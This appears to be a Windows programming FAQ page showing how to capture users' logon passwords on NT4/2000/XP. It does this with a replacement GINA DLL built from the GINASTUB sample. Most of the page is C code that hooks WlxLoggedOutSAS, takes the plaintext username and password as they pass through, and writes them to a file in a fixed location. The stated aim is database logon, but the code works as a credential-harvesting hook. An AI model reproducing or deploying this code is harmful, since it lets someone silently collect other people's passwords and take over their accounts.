How do I grab the users password under NT4/2000/XP?

Microsoft actually document how to do this (it's a common requirement for programs which need to log into a database using the users own security credentials).

Warning - this code not functional under Vista/Windows 7/Server 2008

Vista, Server 2008 and Windows 7 use a different authentication provider architecture, so this approach doesn't work anymore. Sorry.

Look at the GINASTUB sample which comes with the Win32 Platform SDK. Essentially, the technique consists of replacing the default GINA with your own, then having your GINA LoadLibrary the default one and call its entry points as required, grabbing the data as it flies past. I have reproduced the important function here, with my own code added for saving the username and password to a file in ANSI format.

int WINAPI WlxLoggedOutSAS (PVOID   pWlxContext,
                            DWORD   dwSasType,
                            PLUID   pAuthenticationId,
                            PSID    pLogonSid,
                            PDWORD  pdwOptions,
                            PHANDLE phToken,
                            PWLX_MPR_NOTIFY_INFO pMprNotifyInfo,
                            PVOID  *pProfile)
{
   HANDLE hFile ;
   DWORD dwBytesWrit ;
   TCHAR szBuffer [130];
   TCHAR szUserName [64];
   TCHAR szPassword [64];

   iRet = GWlxLoggedOutSAS (pWlxContext,
                            dwSasType,
                            pAuthenticationId,
                            pLogonSid,
                            pdwOptions,
                            phToken,
                            pMprNotifyInfo,
                            pProfile);
   if (iRet == WLX_SAS_ACTION_LOGON) 
   {
      WideCharToMultiByte (CP_ACP, 0,
                           pMprNotifyInfo->pszUserName,
                           -1,
                           szUserName,
                           sizeof (szUserName),
                           NULL,
                           NULL);
      WideCharToMultiByte (CP_ACP, 0,
                           pMprNotifyInfo->pszPassword,
                           -1,
                           szPassword,
                           sizeof (szPassword),
                           NULL,
                           NULL);
      wsprintf (szBuffer, "%s,%s\n",
                szUserName,
                szPassword);
      < insert code here to encrypt the data in szBuffer >
      hFile = CreateFile (<Some unique filename in a fixed location >,
                          GENERIC_WRITE,
                          0,
                          NULL,
                          CREATE_ALWAYS,
                          FILE_ATTRIBUTE_NORMAL,
                          NULL);
      if (hFile != INVALID_HANDLE_VALUE)
      {
         WriteFile (hFile, 
                    (LPCVOID)(szBuffer),
                    (DWORD)(strlen (szBuffer)), 
                    &dwBytesWrit,
                    NULL);
         CloseHandle (hFile);
      }
   }
   return iRet;
}

Download